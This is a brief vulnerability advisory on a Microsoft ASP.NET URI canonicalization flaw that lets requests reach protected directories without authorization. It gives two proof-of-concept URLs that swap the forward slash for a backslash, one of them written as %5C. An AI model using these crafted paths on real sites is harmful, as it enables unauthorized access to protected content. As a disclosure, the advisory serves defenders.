Microsoft ASP.NET URI Canonicalization Unauthorized Web Access Vulnerability

Microsoft ASP.NET URI Canonicalization Unauthorized Web Access Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

Mozilla Web Browser based proof of concept:
http://www.example.com/secureDirectory\somefile.aspx

Microsoft Internet Explorer based proof of concept:
http://www.example.com/secureDirectory%5Csomefile.aspx